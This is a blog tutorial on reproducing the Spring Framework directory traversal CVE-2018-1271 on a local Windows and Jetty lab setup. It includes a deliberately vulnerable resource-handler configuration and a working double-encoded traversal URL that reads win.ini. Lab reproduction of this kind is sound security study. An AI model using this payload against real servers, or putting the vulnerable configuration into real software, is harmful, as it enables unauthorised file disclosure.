It’s too late for this blog post but I’ve been caught up with other tasks so couldn’t post this earlier. Anyways, in this blog, we’ll look at how to setup a vulnerable target for CVE-2018-1271 and exploit it.
The issue exists in Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). It should be noted that there are a few conditions for this vulnerability to be introduced:
- The target server is running on Windows.
- The application is running jetty
- And, application serves files from the file system using file:// protocol
Setting up a vulnerable target:
1. Install JDK 1.8 or higher.
2. Download and setup Maven 3.6.0 to C:\Opt\apache-maven-3.6.0
3. Configure Environment Variables:
- Set JAVA_HOME to C:\Program Files (x86)\Java\jdk1.8.0_171\ or any the path where it’s installed.
- Set MAVEN_HOME to C:\Opt\apache-maven-3.6.0\
- Append MAVEN_HOME path to PATH variable: C:\Opt\apache-maven-3.6.0\bin\
- Launch command prompt and make sure following commands work:
mvn -version
java -version
4. Now download spring-mvc-showcase sample application either via GIT or download the ZIP: git clone https://github.com/spring-projects/spring-mvc-showcase.git
5. CD into spring-mvc-showcase-master directory.
6. Edit POM.XML and set org.springframework-version to 5.0.0:
7. Locate WebMvcConfig.java, it’s usually under ./src/main/java/org/springframework/samples/mvc/config/WebMvcConfig.java
8. Edit WebMvcConfig.java and set registry.addResourceHandler to following. This is what makes it vulnerable to Directory Traversal:
registry.addResourceHandler("/resources/**").addResourceLocations("file:./src/main/resources/","/resources/");
9. Now start the project with jetty:
mvn jetty:run
10. Make sure the server is listening on the port specified, usually port 8080.
11. Now visit following link:
http://:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
12. This should download the WIN.INI file:
References: